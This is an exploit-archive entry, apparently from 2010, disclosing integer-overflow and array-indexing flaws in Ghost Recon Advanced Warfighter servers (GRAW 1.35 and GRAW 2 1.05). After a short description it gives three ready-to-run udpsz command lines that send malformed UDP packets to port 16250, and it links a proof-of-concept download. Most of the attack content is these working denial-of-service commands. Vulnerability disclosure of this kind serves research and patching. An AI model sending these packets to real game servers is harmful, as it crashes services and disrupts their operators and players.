Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow
# Published : 2010-07-08
# Author : Luigi Auriemma
# Previous Title : cmd.exe Unicode Buffer Overflow (SEH)
# Next Title : Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak [0-Day]

Ghost Recon Advanced Warfighter (GRAW) is prone to an integer-overflow vulnerability and an array-indexing-overflow vulnerability.

Successful exploits may allow attackers to cause denial-of-service conditions. Due to the nature of these issues, code-execution may also be possible, but this has not been confirmed.

GRAW 1.35 and GRAW 2 1.05 are vulnerable; other versions may also be affected. 

Integer Overflow:

udpsz -C "0100 13 0003 0000 ffffffff" -b 0x41 SERVER 16250 3000

Array Indexing Overflow:

udpsz -C "0100 0d" -X 3 8 l 0 -l 50 -b 0x41 SERVER 16250 3000

or

udpsz -C "0100 0e" -X 3 8 l 0 -l 50 -b 0x41 SERVER 16250 3000 


http://www.exploit-db.com/sploits/grawpoc.zip